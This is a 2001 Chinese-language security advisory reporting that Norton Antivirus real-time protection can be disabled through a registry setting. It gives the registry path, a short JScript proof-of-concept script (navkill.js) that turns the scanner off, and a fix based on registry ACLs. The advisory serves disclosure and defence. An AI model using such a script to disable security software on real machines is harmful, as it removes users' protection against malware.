Norton Antivirus 实时保护系统可被关闭发布时间:2001-06-20 更新时间:2001-06-20 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 受影响系统 Norton Antivirus详细描述 Norton Antivirus 通过实时保护系统扫描文件,其中这个保护系统可以 通过手工关闭,如你在安装某些应用程序时候可以用到,不过这个选项 简单的保存在注册表中,恶意脚本可以把其关闭。 测试代码 如下注册表控制着是否关闭实时保护系统: HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\ CurrentVersion\Storages\Filesystem\RealTimeScan 可以通过下面的简单脚本关闭保护系统: <---==============================--- navkill.js ---==============================---> var WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.RegWrite("HKLM\\SOFTWARE\\INTEL\\LANDesk\\VirusProtect6\\CurrentVersion\\Storages\\Filesystem\\RealTimeScan\\OnOff", 0, "REG_DWORD"); <---==============================--- navkill.js ---==============================---> 解决方案 Windows NT 和2000 用户可以使用ACL保护注册表。 相关信息 Daniel Wischnewski. (daniel at wischnewski.net) |
